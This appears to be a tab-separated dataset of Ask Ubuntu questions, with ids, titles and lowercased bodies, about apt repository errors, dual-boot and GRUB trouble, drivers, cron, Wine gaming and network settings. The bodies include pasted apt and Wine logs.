338427	why do i get 404 errors when running 'apt-get update ' ?	i am not able to update . i also have tried update-manager . it gives the the error message : failed to download repository information , check your internet connection . praveen @ praveen-desktop : ~ $ sudo apt-get update hit http : //archive.ubuntu.com raring release.gpg hit http : //archive.ubuntu.com raring-updates release.gpg get:1 http : //archive.canonical.com raring release.gpg [ 933 b ] hit http : //archive.ubuntu.com raring-backports release.gpg hit http : //archive.canonical.com precise release.gpg hit http : //archive.ubuntu.com raring-security release.gpg hit http : //archive.canonical.com raring release.gpg hit http : //archive.ubuntu.com raring release get:2 http : //archive.canonical.com raring release [ 5,919 b ] hit http : //archive.ubuntu.com raring-updates release hit http : //archive.ubuntu.com raring-backports release hit http : //archive.canonical.com precise release hit http : //archive.ubuntu.com raring-security release hit http : //archive.canonical.com raring release hit http : //archive.ubuntu.com raring/main sources get:3 http : //archive.canonical.com raring/partner sources [ 2,693 b ] hit http : //archive.ubuntu.com raring/restricted sources get:4 http : //archive.canonical.com raring/partner amd64 packages [ 3,641 b ] hit http : //archive.ubuntu.com raring/universe sources get:5 http : //archive.canonical.com raring/partner i386 packages [ 4,792 b ] hit http : //archive.ubuntu.com raring/multiverse sources get:6 http : //ppa.launchpad.net raring release.gpg [ 316 b ] hit http : //archive.ubuntu.com raring/main amd64 packages ign http : //ppa.launchpad.net raring release.gpg hit http : //archive.ubuntu.com raring/restricted amd64 packages get:7 http : //ppa.launchpad.net raring release.gpg [ 316 b ] get:8 http : //archive.canonical.com precise/partner sources [ 5,215 b ] hit http : //ppa.launchpad.net raring release.gpg hit http : //archive.ubuntu.com raring/universe amd64 packages hit http : //ppa.launchpad.net raring release.gpg hit http : //archive.ubuntu.com raring/multiverse amd64 packages hit http : //ppa.launchpad.net raring release.gpg hit http : //archive.canonical.com precise/partner amd64 packages hit http : //ppa.launchpad.net raring release.gpg hit http : //archive.ubuntu.com raring/main i386 packages hit http : //archive.canonical.com precise/partner i386 packages hit http : //ppa.launchpad.net raring release hit http : //archive.ubuntu.com raring/restricted i386 packages ign http : //ppa.launchpad.net raring release hit http : //archive.ubuntu.com raring/universe i386 packages hit http : //ppa.launchpad.net raring release ign http : //ppa.launchpad.net raring release get:9 http : //archive.canonical.com raring/partner sources [ 2,693 b ] hit http : //archive.ubuntu.com raring/multiverse i386 packages hit http : //ppa.launchpad.net raring release hit http : //archive.canonical.com raring/partner amd64 packages hit http : //ppa.launchpad.net raring release hit http : //archive.canonical.com raring/partner i386 packages hit http : //archive.ubuntu.com raring/main translation-en hit http : //ppa.launchpad.net raring release hit http : //ppa.launchpad.net raring release hit http : //archive.ubuntu.com raring/multiverse translation-en get:10 http : //ppa.launchpad.net raring/main sources [ 1,659 b ] hit http : //ppa.launchpad.net raring/main amd64 packages hit http : //ppa.launchpad.net raring/main i386 packages hit http : //archive.ubuntu.com raring/restricted translation-en hit http : //archive.ubuntu.com raring/universe translation-en hit http : //archive.ubuntu.com raring-updates/main sources hit http : //archive.ubuntu.com raring-updates/restricted sources hit http : //archive.ubuntu.com raring-updates/universe sources hit http : //archive.ubuntu.com raring-updates/multiverse sources hit http : //archive.ubuntu.com raring-updates/main amd64 packages hit http : //archive.ubuntu.com raring-updates/restricted amd64 packages get:11 http : //ppa.launchpad.net raring/main sources [ 743 b ] ign http : //ppa.launchpad.net raring/main amd64 packages/diffindex ign http : //ppa.launchpad.net raring/main i386 packages/diffindex hit http : //archive.ubuntu.com raring-updates/universe amd64 packages hit http : //archive.ubuntu.com raring-updates/multiverse amd64 packages hit http : //archive.ubuntu.com raring-updates/main i386 packages get:12 http : //ppa.launchpad.net raring/main sources [ 9,222 b ] hit http : //archive.ubuntu.com raring-updates/restricted i386 packages hit http : //archive.ubuntu.com raring-updates/universe i386 packages hit http : //ppa.launchpad.net raring/main amd64 packages hit http : //archive.ubuntu.com raring-updates/multiverse i386 packages hit http : //ppa.launchpad.net raring/main i386 packages ign http : //archive.canonical.com raring/partner translation-en_in hit http : //archive.ubuntu.com raring-updates/main translation-en ign http : //archive.canonical.com raring/partner translation-en get:13 http : //ppa.launchpad.net raring/main sources [ 11.5 kb ] ign http : //archive.canonical.com precise/partner translation-en_in hit http : //archive.ubuntu.com raring-updates/multiverse translation-en ign http : //archive.canonical.com precise/partner translation-en ign http : //archive.canonical.com raring/partner translation-en_in hit http : //ppa.launchpad.net raring/main amd64 packages hit http : //archive.ubuntu.com raring-updates/restricted translation-en ign http : //archive.canonical.com raring/partner translation-en hit http : //ppa.launchpad.net raring/main i386 packages hit http : //archive.ubuntu.com raring-updates/universe translation-en hit http : //archive.ubuntu.com raring-backports/main sources get:14 http : //ppa.launchpad.net raring/main sources [ 657 b ] hit http : //archive.ubuntu.com raring-backports/restricted sources hit http : //ppa.launchpad.net raring/main amd64 packages hit http : //archive.ubuntu.com raring-backports/universe sources hit http : //ppa.launchpad.net raring/main i386 packages hit http : //archive.ubuntu.com raring-backports/multiverse sources hit http : //archive.ubuntu.com raring-backports/main amd64 packages get:15 http : //ppa.launchpad.net raring/main sources [ 603 b ] ign https : //private-ppa.launchpad.net raring release.gpg hit http : //ppa.launchpad.net raring/main amd64 packages hit http : //archive.ubuntu.com raring-backports/restricted amd64 packages hit http : //ppa.launchpad.net raring/main i386 packages hit http : //archive.ubuntu.com raring-backports/universe amd64 packages hit http : //archive.ubuntu.com raring-backports/multiverse amd64 packages hit http : //archive.ubuntu.com raring-backports/main i386 packages hit http : //archive.ubuntu.com raring-backports/restricted i386 packages hit http : //archive.ubuntu.com raring-backports/universe i386 packages hit http : //archive.ubuntu.com raring-backports/multiverse i386 packages hit http : //archive.ubuntu.com raring-backports/main translation-en hit http : //archive.ubuntu.com raring-backports/multiverse translation-en hit http : //ppa.launchpad.net raring/main amd64 packages err http : //extras.ubuntu.com raring release.gpg something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) hit http : //ppa.launchpad.net raring/main i386 packages hit http : //archive.ubuntu.com raring-backports/restricted translation-en hit http : //archive.ubuntu.com raring-backports/universe translation-en hit http : //archive.ubuntu.com raring-security/main sources hit http : //archive.ubuntu.com raring-security/restricted sources hit http : //archive.ubuntu.com raring-security/universe sources hit http : //archive.ubuntu.com raring-security/multiverse sources hit http : //archive.ubuntu.com raring-security/main amd64 packages hit http : //archive.ubuntu.com raring-security/restricted amd64 packages hit http : //archive.ubuntu.com raring-security/universe amd64 packages hit http : //archive.ubuntu.com raring-security/multiverse amd64 packages hit http : //archive.ubuntu.com raring-security/main i386 packages hit http : //archive.ubuntu.com raring-security/restricted i386 packages hit http : //archive.ubuntu.com raring-security/universe i386 packages hit http : //archive.ubuntu.com raring-security/multiverse i386 packages hit http : //archive.ubuntu.com raring-security/main translation-en hit https : //private-ppa.launchpad.net raring release ign https : //private-ppa.launchpad.net raring/main amd64 packages/diffindex hit http : //archive.ubuntu.com raring-security/multiverse translation-en hit http : //archive.ubuntu.com raring-security/restricted translation-en ign https : //private-ppa.launchpad.net raring/main i386 packages/diffindex hit http : //archive.ubuntu.com raring-security/universe translation-en hit https : //private-ppa.launchpad.net raring/main amd64 packages hit https : //private-ppa.launchpad.net raring/main i386 packages ign http : //ppa.launchpad.net raring/main translation-en_in ign http : //ppa.launchpad.net raring/main translation-en err http : //ppa.launchpad.net raring/main sources 404 not found err http : //ppa.launchpad.net raring/main amd64 packages 404 not found err http : //ppa.launchpad.net raring/main i386 packages 404 not found hit http : //extras.ubuntu.com raring release ign http : //ppa.launchpad.net raring/main translation-en_in ign http : //extras.ubuntu.com raring/main sources/diffindex ign http : //ppa.launchpad.net raring/main translation-en ign http : //extras.ubuntu.com raring/main amd64 packages/diffindex ign http : //extras.ubuntu.com raring/main i386 packages/diffindex ign http : //ppa.launchpad.net raring/main translation-en_in hit http : //extras.ubuntu.com raring/main sources ign http : //ppa.launchpad.net raring/main translation-en hit http : //extras.ubuntu.com raring/main amd64 packages ign http : //ppa.launchpad.net raring/main translation-en_in hit http : //extras.ubuntu.com raring/main i386 packages ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main translation-en_in ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main translation-en_in ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main translation-en_in ign http : //ppa.launchpad.net raring/main translation-en ign http : //extras.ubuntu.com raring/main translation-en_in ign http : //extras.ubuntu.com raring/main translation-en ign https : //private-ppa.launchpad.net raring/main translation-en_in ign https : //private-ppa.launchpad.net raring/main translation-en ign http : //archive.ubuntu.com raring/main translation-en_in ign http : //archive.ubuntu.com raring/multiverse translation-en_in ign http : //archive.ubuntu.com raring/restricted translation-en_in ign http : //archive.ubuntu.com raring/universe translation-en_in ign http : //archive.ubuntu.com raring-updates/main translation-en_in ign http : //archive.ubuntu.com raring-updates/multiverse translation-en_in ign http : //archive.ubuntu.com raring-updates/restricted translation-en_in ign http : //archive.ubuntu.com raring-updates/universe translation-en_in ign http : //archive.ubuntu.com raring-backports/main translation-en_in ign http : //archive.ubuntu.com raring-backports/multiverse translation-en_in ign http : //archive.ubuntu.com raring-backports/restricted translation-en_in ign http : //archive.ubuntu.com raring-backports/universe translation-en_in ign http : //archive.ubuntu.com raring-security/main translation-en_in ign http : //archive.ubuntu.com raring-security/multiverse translation-en_in ign http : //archive.ubuntu.com raring-security/restricted translation-en_in ign http : //archive.ubuntu.com raring-security/universe translation-en_in fetched 50.9 kb in 1min 10s ( 722 b/s ) w : gpg error : http : //ppa.launchpad.net raring release : the following signatures could n't be verified because the public key is not available : no_pubkey 7b1ab59047b4d1c4 w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/release.gpg something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) w : failed to fetch http : //ppa.launchpad.net/guadalinex-members/ppa/ubuntu/dists/raring/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/guadalinex-members/ppa/ubuntu/dists/raring/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/guadalinex-members/ppa/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
338431	why do ubuntu servers connect to likho.canonical.com:80 ?	we have some ubuntu 12.0.3 servers in our network and i can see several denies per day on our physical firewall . the ubuntu servers are attempting to connect to 91.189.91.15 ( likho.canonical.com ) over port 80 . can anyone tell me what this connection attempt is and should i allow the traffic or configure the server to stop making the connection attempt ?
338435	ca n't install gsfonts-x11 or flashplugin-installer on ubuntu 12.10 ?	so i downloaded ubuntu 12.10 on a dell mini inspiron 910 . had problems with wifi , but i bought a wireless adapter and so i fixed that . but when i try installing flash , with sudo apt-get install flashplugin-installer gsfonts-x11 it gives me : reading package lists ... done building dependency tree reading state information ... done package gsfonts-x11 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : unable to locate package flashplugin-installer e : package 'gsfonts-x11 ' has no installation candidate which i do n't really understand .
338437	after the failed installation of a video card/driver ubuntu 13.04 displayed a blank ( black ) screen	i inserted a new video card ( asus gt630-sl-2gd3-l ) . it was not initially detected by ubuntu 13.04 . i went ahead to the ubuntu software center and downloaded the nvidia-current driver . upon reboot , after the ubuntu splash screen , all i got was a blank ( black ) screen . however , in experimenting , i noticed that the computer was operating normally except for the display . the video card , for some unknown reason , was eventfully recognized by ubuntu and also correctly displayed the monitor information . as an attempt to fix the blank screen , i reloaded the ubuntu-desktop , unity , and xrog . but none of these actions restored the display of the launchpad and icons . i found , on august 29 , 2013 , the solution at these websites . how to reset compiz and unity in ubuntu 12.10 or 13.04 . also see : reset unity and gnome to default values [ duplicate ] . specifically the post by zta , which is the third post down . the launcher/icons were restored . problem solved . since originally making this post , another link was made available that shows both the problem with a solution . `` unity does n't load , no launcher , no dash appears '' . this post is worth reviewing too .
338440	power save mode	i just installed ubuntu on a dual boot . when i run the system with ubuntu , it goes for about 30 seconds and then the screen turns black and showing the message enter power save mode . i have to restart the system over and over again . my computer system is a dell xps 8100 . when i run the system under windows , i do not have this problem . is there anyone who can help me with this terrible issue and tell me step by step what to do ?
338442	how to set static ip address ?	i have configured network adapter of guest ubuntu to work in a bridged mode so i could ssh to it from the host machine . the problem is that the guest ubuntu ip address keep changing . even though it changes within a very short range 192.168.0.4-10 it is still takes time to configure putty and other programs each time . is there a way to make the guest ubuntu ip address to be static ? my guest os has the full gui .
338444	acces to my pc from hostile access point	i connected to a wifi access point that had cloned my ssid . i did not enter my ubuntu password during the connection , since i did not install anything . i just used firefox for several minutes . is there any theoretical chance of anybody accessing my data or changing anything in the system or bios ?
338447	why does n't $ home change if i use sudo ?	i expected the -h option to give me the target user 's environment . nbest @ geo : ~ $ sudo -h -u tanum echo $ home /home/nbest nbest @ geo : ~ $ sudo -u tanum echo $ home /home/nbest nbest @ geo : ~ $ sudo -i -u tanum echo $ home /home/nbest nbest @ geo : ~ $ sudo -h -i -u tanum echo $ home /home/nbest this would allow me to say : sudo -u tanum ls ~ and get the target user 's home directory listing . not the case . is this caused by the env_reset default in sudoers ? if so does -h have any effect ? what is the safest way to override this behavior ? if not what is the intended effect of -h ? please set me straight .
338450	which version of ubuntu for installing alongside windows 8 or formatting windows without touching ubuntu 12.04 in its partition	i have windows 8 and ubuntu 12.04 installed alongside , within a partition each . since i had upgraded from windows 7 after having installed ubuntu , i had no problem with the ubuntu installation back then . but , because of the upgrade , windows 8 works with a plethora of problems , and i want to format and install a clean version , maybe with 8.1 . i want to keep the ubuntu partition as is , if possible , or i can format that as well and upgrade to 13.04 , possibly . which is the easier way to go , and what are the possible problems i might encounter ?
338451	windows 8 on ssd , ubuntu 12.04.3 on hdd , easybcd not working here , how to boot into ubuntu ?	i have windows 8 on an ssd , and i put ubuntu 12.04.3 on a partition on my hard drive . since the boot order is set to read from the ssd first , i had to change something . i read some related threads on here about using easybcd , so i downloaded that and tried it . first , i tried just adding ubuntu to the boot order . it appeared there , but when i selected it , it brought me to a grub command line interface . i tried typing `` boot '' , but it said the kernel must be loaded . i tried `` help '' , but could n't figure out how to load the kernel . then i read some more , and followed steps to add neogrub to the boot list , but selecting that option just brought me back to the grub command line interface . am i doing something wrong ? am i supposed to use that interface ?
338453	indicator-messages binary location	where is the indicator-messages binary located or from which package is the binary for the indicator where evolution and empathy messages are shown ? dpkg -l indicator-messages | grep bin shows me nothing .
338454	is it possible to use two laptops as dual display monitors in the same x session ?	picture this : you have two identicle laptops . both running ubuntu with x11 . now rather than having two seperate ubuntu machines is it possible , through xserver , to connect laptop2 to laptop1 as a second display that runs in the same session as laptop1 ? basically i want to be able to replicate the effect of plugging in an external vga monitor to laptop1 with laptop2 . i know there are programs like synergy to act as a virtual kvm between two machines . but you still have two seperate systems with seperate displays and programs and such . i know you could use vnc to get laptop1 's display on laptop2 , but then you have the opposite effect of having one display with two mice and keyboard , on two monitors . aside from the issues with those solutions , i 'm trying to do this without too much bloat , and i know xserver has remote capabilities , but i do n't yet have the knowledge to implement what i 'm trying to do . i 'm looking for either specific ways to do this or references to specific documentation to help me implement this .
338460	cant access color calibration on ubuntu	i want to calibrate my color profile on ubuntu , but the calibration button is faded out and will not allow calibration . i have an intel graphics macbook pro mid 2013 13 inch . i tried to install intel graphics , and i did install something , but nothing changed . the color is out of sync , way too much glow or something . is there either a program or work around for this ? i uploaded a screenshot of the color settings ( via the ubuntu forum ) .
338463	reducing multiple mp3 bitrate	i 'm looking for a tool for ubuntu 13.04 that can reduce the bitrate of multiple mp3 files . does anyone happen to know such a tool ?
338474	grub rescue set on partition that does n't exist	i recently got a new laptop with windows 7 installed . i downloaded 12.04 lts iso and created a bootable usb stick . i booted into ubuntu on my laptop and installed ubuntu , choosing the 'side by side ' option for windows and ubuntu . now when i boot i get this error and a grub rescue prompt . error : no such device : f0e797ec-17f0-4777-8296-1a44b8524753 ls ( hd0 ) ( hd0 , msdos4 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) ( hd1 ) ( hd1 , msdos1 ) ( hd2 ) ( hd2 , msdos5 ) ( hd2 , msdos1 ) set prefix= ( hd0,5 ) /boot/grub root=hd0,5 notably , a set command returns partitions that do n't exist when i do an ls . furthermore , when i do an ls on all of the partitions shown above , they all return 'unknown filesystem ' . which i take to mean that none of the partitions are linux partitions . any idea what the heck might be going on here ?
338483	how do i install intel integrated graphics controller ?	i try to find what graphics card i 'm running , the commands in terminal only gives me this : vga compatible controller : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller . how do i install the correct driver ? as i can see that not everything is displaying correctly . i want to set a proper resolution , but ca n't as i do n't have the right drivers on my ubuntu 12.04 machine . it 's an acer aspire one netbook .
338486	why does it take 5-10 minutes to mount an external hdd ?	i have an external hdd drive ( usb 3.0 , 750gb ) almost full . when i connect it to a usb port in my laptop ( usb 3.0 or usb 2.0 ) , it takes forever mounting it ( like 5 to 10 minutes ) but finally does it . perhaps , does it perform a full scan of it before mounting it ?
338491	bootmgr is missing	how do i setup the file system and partitions to dual-boot windows 7 and ubuntu ? bootmgr is missing , and the os can not be found . i 've looked at a few utilities , like ubcd , but they are somewhat technical and i do n't wish to mess up my system any more than it already is .
338497	which has precedence in cobbler , profile or preeseed ?	for cobbler on ubuntu 12.04 server regarding the network configuration ( or any settings for that matter ) which has precedence during the pxe install - the profile ( cobbler system add ... ) or the preseed file ? the question then is why ?
338499	some notebook keyboard keys do not work in ubuntu	installed ubuntu 13.04 on my acer as5733-6898 , and worked well , but he does not recognize anything when i press the buttons to move music ( with some player running ) and also does nothing when i try to use the buttons that control the brightness of the screen , since that increase volume keys work well . what can it be ? can anyone help me ?
338501	how to hide machine name from displaying in terminal session screen	as you can see from the screenshot , my entire machine name ( looks like a key ) gets displayed whenever i invoke a terminal session . is there any way to avoid or hide it ?
338504	install ubuntu alongside windows ?	i want to install ubuntu for first time . if i install ubuntu alongside window 7 or 8 there will be no problem ?
338510	change default user on login	i have ubuntu on a 16gb flash drive . every time i start it it logs me in as `` ubuntu '' i made another user with my name and a password , how do i get it to login me in as the new user by default ? so instead of just logging me in as `` ubuntu '' it should log me in as the new user ? that way i do not have to log out and log back in every time . sorry if that is unclear . thanks for the help .
338514	ubuntu 12.04 cron not executing	here 's the issue i 'm having ... i have a webserver that sees a fair bit of traffic . i want to keep a near real time backup of it on another server . that backup server will process log files , visitor tracking files , db backups , etc . so i have several commands being executed at different times via cron on the backup server ( crontab -e ) . for whatever reason i was only getting mail for some of the executions so i added logging today . i do n't think any of the commands under the user 's cron are executing . ( and they did n't under the root cron either - sudo crontab -e. ) below is an example of a command that runs fine from the cli but not from the cron . the directory /media/eagle805 is a directory on the backup server where the primary server ( eagle805 ) is mounted . the directory is owned by the user who owns the cron . */1 * * * * mv /media/eagle805/ver1/php/visitortracking/data/raw/*.raw /var/www/ver1/php/visitortracking/data/raw/ . > > /var/www/backups/visitor_tracking_file_move_ $ ( date + % y- % m- % d ) .log 2 > & 1 when i run this command from the cli it works fine . the log file is created ( and empty ) . all the files i want moved from the primary to the backup server are moved . but it does n't run from cron . i am getting this error ( via email ) : /bin/sh : 1 : syntax error : end of file unexpected ( expecting `` ) '' ) can anyone tell me what i 'm missing ? thanks
338518	fifa 13 with wine 1.5 ( nvidia optimus )	i installed fifa 13 on my ubuntu . its working with intel card but i need it to work with my nvidia . so i 'm writing in terminal : primusrun wine `` c : \program files\fifa 13\game\fifa13.exe '' its opening but just a blank screen nothing more . here is whats written on my terminal : fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : advapi : eventregister { 7733e444-c31d-4c81-95e3-d46e17a6a36f } , 0x600f50 , 0x3d24ee0 , 0x3d24ed8 fixme : advapi : eventregister { d6f6af8e-328a-45c8-b504-ac2e43a17446 } , 0x600f50 , 0x3d24f18 , 0x3d24f10 fixme : advapi : eventregister { 4f841543-0aa3-4313-a232-85ec7fff426b } , 0x600f50 , 0x3d24f50 , 0x3d24f48 fixme : advapi : eventregister { 6e496e5e-d6c8-4522-930f-3556a6425109 } , 0x600f50 , 0x3d24f88 , 0x3d24f80 fixme : advapi : eventregister { 491ae06a-ba67-462e-8bd6-e594116ead1d } , 0x600f50 , 0x3d24fc0 , 0x3d24fb8 fixme : advapi : eventregister { 2ec209be-090c-4504-b6d4-533067f18e57 } , 0x600f50 , 0x3d24ff8 , 0x3d24ff0 ___________________________________________ | | | build id : 48199 | | perforce cl : 1193581 | |___________________________________________| -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- total user memory : 2147483647 bytes - 2048.00 mb total available memory : 2147483647 bytes - 2048.00 mb -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- arg0 : fifa.exe -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- memoryframework initialization - set up heaps loading : z : \home\serhan\memoryfw.ini using embedded copy of file : z : \home\serhan\memoryfw.ini memorytracking heap disabled ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- available ram before heaps : 2147483647 bytes - 2048.00 mb size used by heaps : 0 bytes - 0.00 mb available ram after heaps : 2147483647 bytes - 2048.00 mb -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- creating ea : :messaging : :server initializing ea messaging system patchpath : patch.big fixme : thread : setthreadidealprocessor ( 0x158 ) : stub fixme : thread : setthreadidealprocessor ( 0x15c ) : stub fixme : thread : setthreadidealprocessor ( 0x160 ) : stub fixme : thread : setthreadidealprocessor ( 0x168 ) : stub fixme : thread : setthreadidealprocessor ( 0x16c ) : stub fixme : thread : setthreadidealprocessor ( 0x174 ) : stub fixme : thread : setthreadidealprocessor ( 0x17c ) : stub fixme : thread : setthreadidealprocessor ( 0x180 ) : stub preloading 1st big file [ systems ] datax.big not found , probably loose file build [ systems ] data0.big not found , probably loose file build loading 1st bigfile took 1 ms ~~~~~~~~~~~done preload loading locale big file ~~~~~~~~~~~done loading locale big file loading region big files fixme : thread : setthreadidealprocessor ( 0x184 ) : stub fixme : thread : setthreadidealprocessor ( 0x18c ) : stub iniload > test.ini nkeys [ 0 ] iniload > user.ini nkeys [ 0 ] fixme : thread : setthreadidealprocessor ( 0x194 ) : stub changelist # for this build : 1193581 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- loading dll modules . system memory before = 2097151k -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- fixme : thread : setthreadidealprocessor ( 0x198 ) : stub fixme : thread : setthreadidealprocessor ( 0x1ac ) : stub before loaddataarchives ( 1 ) [ systems ] data1.big not found , probably loose file build [ systems ] data2.big not found , probably loose file build [ systems ] data3.big not found , probably loose file build [ systems ] data4.big not found , probably loose file build [ systems ] data5.big not found , probably loose file build hello from int pow hello from int pow hello from int pow hello from int pow [ systems ] data6.big not found , probably loose file build hello from int pow hello from int pow [ systems ] data7.big not found , probably loose file build windowsmessagethread started fixme : system : systemparametersinfow unimplemented action : 59 ( spi_setstickykeys ) after loaddataarchives ( 1 ) primus : warning : recreating incompatible pbuffer fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x16dae0c8,0x00000000 ) , stub ! fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : query_init unhandled query type 0xc . fixme : d3d : query_init unhandled query type 0xa . fixme : d3d : query_init unhandled query type 0xa . fixme : d3d : query_init unhandled query type 0xa . fixme : d3d : query_init unhandled query type 0xa . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : thread : setthreadidealprocessor ( 0x1b4 ) : stub fixme : wbemprox : client_security_setblanket 0x7d148280 , 0x19da20 , 10 , 0 , ( null ) , 3 , 3 , ( nil ) , 0x00000000 fixme : wbemprox : client_security_release 0x7d148280 fixme : wbemprox : enum_class_object_next timeout not supported fixme : wbemprox : client_security_setblanket 0x7d148280 , 0x19d318 , 10 , 0 , ( null ) , 3 , 3 , ( nil ) , 0x00000000 fixme : wbemprox : client_security_release 0x7d148280 fixme : wbemprox : enum_class_object_next timeout not supported pads 5 out of 5 device 0 : 0- > 0 : pad device 1 : 1- > 1 : pad device 2 : 2- > 2 : pad device 3 : 3- > 3 : pad device 4 : 5- > 5 : keyboardpad device 5 : 4- > 4 : mouse device 6 : 5- > 5 : keyboard c : \users\serhan\belgelerim\fifa 13\buttondatasetup.ini : size 100872 , pointer 0b180c60 fixme : winediag : auddrv_getaudioendpoint winepulse is not officially supported by the wine project fixme : winediag : auddrv_getaudioendpoint for sound related feedback and support , please visit http : //ubuntuforums.org/showthread.php ? t=1960599 fixme : dsound : dsound_recalcformat conversion from 4 to 2 channels is not implemented , falling back to stereo fixme : dsound : dsound_recalcformat conversion from 6 to 2 channels is not implemented , falling back to stereo fixme : dsound : dsound_recalcformat conversion from 8 to 2 channels is not implemented , falling back to stereo fixme : dsound : dsound_recalcformat conversion from 8 to 2 channels is not implemented , falling back to stereo fixme : dsound : dsound_recalcformat conversion from 8 to 2 channels is not implemented , falling back to stereo fixme : dsound : dsound_recalcformat conversion from 8 to 2 channels is not implemented , falling back to stereo fixme : dsound : dsound_recalcformat conversion from 8 to 2 channels is not implemented , falling back to stereo fixme : dsound : dsound_recalcformat conversion from 8 to 2 channels is not implemented , falling back to stereo [ audio ] load file 'audiodata/moduledefs/streampoolsdef.xml ' size 0k audio : :load could not find 'audiodata/moduledefs/streampoolsdef.xml' [ audio ] load file 'audiodata/mixer/loadfile.xml ' size 0k audio : :load could not find 'audiodata/mixer/loadfile.xml' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- loading dll modules . system memory after = 2097151k rough cost to system memory = 0k -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- fixme : thread : setthreadidealprocessor ( 0x20c ) : stub fixme : thread : setthreadidealprocessor ( 0x210 ) : stub fixme : thread : setthreadidealprocessor ( 0xfffffffe ) : stub fethread started inputthread started fixme : thread : setthreadidealprocessor ( 0x214 ) : stub -- -- - begin initializegamecomponents -- -- - -- -- - begin initializedatagate -- -- - free system ram : 2048.00 megs - 2147483647 bytes free system ram : 2048.00 megs - 2147483647 bytes -- -- - initializedatagate failed : unable to load .db file -- -- - -- -- - end initializegamecomponents -- -- - free system ram : 2048.00 megs - 2147483647 bytes -- -- - begin initializefecomponents -- -- - free system ram : 2048.00 megs - 2147483647 bytes fixme : dbghelp : elf_search_auxv ca n't find symbol in module fixme : dbghelp : minidumpwritedump niy minidumpwithdatasegs fixme : dbghelp : elf_search_auxv ca n't find symbol in module fixme : dbghelp : minidumpwritedump niy minidumpwithdatasegs
338519	will removing open jdk stablize crashing ubuntu ?	i 'm running ubuntu 13.04 on an asus zenbook . mostly this performs very well and i 'm quite happy with it but when using eclipse 3.8 i 'm having problems which sometimes crash my whole system . this is becoming quite frustrating . occasionally ubuntu recovers the crash and sends a bug report , listing open jdk as the culprit . has anyone else experienced this ? will removing open jdk and putting proper oracle / java on my machine help ? is this a difficult operation ? many many thanks .
338520	new ubuntu install on an ibm t 42 thinkpad	i have tried installing 3 or 4 versions of ubuntu from my flash drive but am unsuccessful . is there anyone who has a step by step guide as to how this is done and what version ? i kept going back version by version due to a cpa error for the processor , i look around online for others who have done this and mostly i find statements that ubuntu works great on their t 42 but no explanation as to how that was accomplished . any help would be greatly appreciated . my t 42 has xp and i would like to try running ubuntu from a stick or installed along with xp before i commit completely to the linux os.. thanks so much ! ! - john
338534	ubuntu plus windows office	can i install only ubuntu as an operating system and use windows office and the work program ? would this minimize or eliminate the virus problem we have with windows ?
338535	how can one call programs that are not `` rooted '' in the operating system	i am currently trying to install a php extension on my computer . i am in the process of developing a new site and i am using lampp . i used pecl to install the syck yaml extension so that i can parse yaml to a php array in a file that will run daily with cronjobs . in the process of trying to install it , i broke lampp and had to re-install it , but i got the extension installed . here 's the kicker ! the extension was installed on php5 that is called by the terminal . if i : # php ./politicianupdate.php it runs as it should , but it is not using the php installation inside of lampp , which is a problem because the php being ran from the terminal is not linked up to my databases , which i need to keep the data current . two things i need to figure out : how i can call a .php file from the terminal using the php installation in lampp , and the other thing i need to know is how can i point a pecl/pear installation at the installation of php in lampp ? the output of whereis php is : php : /usr/bin/php /usr/bin/x11/php /usr/share/php /opt/lampp/bin/php /usr/share/man/man1/php.1.gz
338538	how to fix malformed lines in /etc/apt/sources.list ?	i am getting this error message : e : malformed line 56 in source list /etc/apt/sources.list ( dist parse ) and as a result the update manager wo n't work . i am very new to linux so if you could break it down really simply i would appreciate it greatly .
